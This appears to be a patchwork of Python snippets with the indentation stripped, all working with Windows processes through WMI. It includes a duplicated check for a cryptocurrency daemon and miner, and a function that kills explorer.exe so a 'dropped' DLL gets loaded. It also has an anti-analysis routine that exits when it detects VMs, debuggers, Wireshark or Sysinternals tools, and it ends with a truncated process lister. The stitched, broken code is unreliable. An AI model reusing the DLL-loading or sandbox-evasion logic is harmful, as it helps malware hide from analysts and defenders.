def runningcheck():
"""Function to check if daemon is running"""
daemonrunning, walletrunning, minerrunning = False, False, False
if platform == 'win32':
import wmi
wmi = wmi.WMI()
for process in wmi.Win32_Process():
# print process.ProcessId, process.Name
if process.Name == 'myntd.exe':
daemonrunning = True
# print 'daemon'
if process.Name == 'mynt-wallet-cli.exe':
walletrunning = True
# print 'wallet'
if process.Name == 'minerd.exe':
minerrunning = True
# print 'miner'
elif platform == 'linux' or platform == 'linux2' or platform == 'darwin':
p = subprocess.Popen("ps -A",
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
output, errors = p.communicate()
if 'myntd' in output:
daemonrunning = True
if 'mynt-wallet-cli' in output:
walletrunning = True
if 'minerd' in output:
minerrunning = True
return daemonrunning, walletrunning, minerrunning
def terminate(self, processname):
for process in wmi.Win32_Process():
if process.Caption == processname:
try:
process.Terminate(process.ParentProcessId)
except Exception as error:
return False
else:
return True
def restart_explorer():
"""
Once the DLL is dropped we can either wait for a reboot
or just kill the process, the process should auto-restart
and after a while the DLL gets loaded
"""
try:
for process in wmi.Win32_Process():
if (process.Caption == "explorer.exe"):
process.Terminate(process.ParentProcessId)
except Exception as error:
return False
def runningcheck():
"""Function to check if daemon is running"""
daemonrunning = False
if platform == 'win32':
import wmi
wmi = wmi.WMI ()
for process in wmi.Win32_Process(name='myntd.exe'):
#print process.ProcessId, process.Name
if process.Name:
daemonrunning = True
elif platform == 'linux' or platform == 'linux2' or platform == 'linux32':
p = sub.Popen("ps -A | grep myntd", shell=True, stdout=sub.PIPE, stderr=sub.PIPE)
output, errors = p.communicate()
if output:
daemonrunning = True
return daemonrunning
def check_win_env():
# Are we in a VM?
try:
import wmi
except:
return ("[!]Import issue with WMI")
ProcessList = ["ollydbg.exe","ProcessHacker.exe","vmsrvc.exe",
"fiddler.exe","tcpview.exe","vmware.exe","vbox.exe","vmvss.exe",
"vmscsi.exe","vmhgfs.exe","vboxservice.exe","vmxnet.exe","vmx_svga.exe",
"df5serv.exe","vmmemctl.exe","autoruns.exe","autorunsc.exe","vmusbmouse.exe",
"filemon.exe","procmon.exe","vmtools.exe","regmon.exe","vboxtray.exe","procexp.exe",
"vmrawdsk.exe","idaq.exe","idaq64.exe","ImmunityDebugger.exe","Wireshark.exe",
"dumpcap.exe","HookExplorer.exe","ImportREC.exe","PETools.exe","LordPE.exe",
"SysInspector.exe","proc_analyzer.exe","sysAnalyzer.exe","sniff_hit.exe","windbg.exe",
"joeboxcontrol.exe","joeboxserver.exe","vmtoolsd.exe","vmwaretray.exe","vmwareuser.exe",
"vmusrvc.exe","prl_cc.exe","prl_tools.exe","xenservice.exe"]
try:
for process in wmi.Win32_Process():
for processName in ProcessList:
if (process.Name.lower().find(processName) == 0):
if debug == True:
return ("[!]It is likely we are in a VM.")
else:
# Stop executing
sys.exit()
else:
pass
except Exception as e:
if debug == True:
return e
else:
pass
# Is there a debugger present?
debug_present = ctypes.windll.kernel32.IsDebuggerPresent()
if debug_present and debug == True:
return ("[!]A debugger appears to be present")
elif debug_present:
# Stop executing
sys.exit()
else:
pass
def kaboom():
global hash
global processExploder
print "****** Process Exploder ******\n"
print "|-- Start Time --|-- PID --|-- Process Name --|-- Domain\User --|-- Path & Run Command --|-- Handle & Thread Count --|-- SHA1 Hash --|\n"
for processExploder in wmi.Win32_Process():
path = processExploder.ExecutablePath # Get the process path. This is used to create a SHA1 hash.
date = processExploder.CreationDate # Get the timestamp for when a process is created.
date = str(date)
date = date[:14]
try:
z = processExploder.GetOwner() # Get the owner info for a process
z = "{0}\{1}" .format(z[0], z[2]) # Display only domain and username
except Exception:
z = " Unknown " # If a process is closed while running this script, the GetOwner method will throw an exception.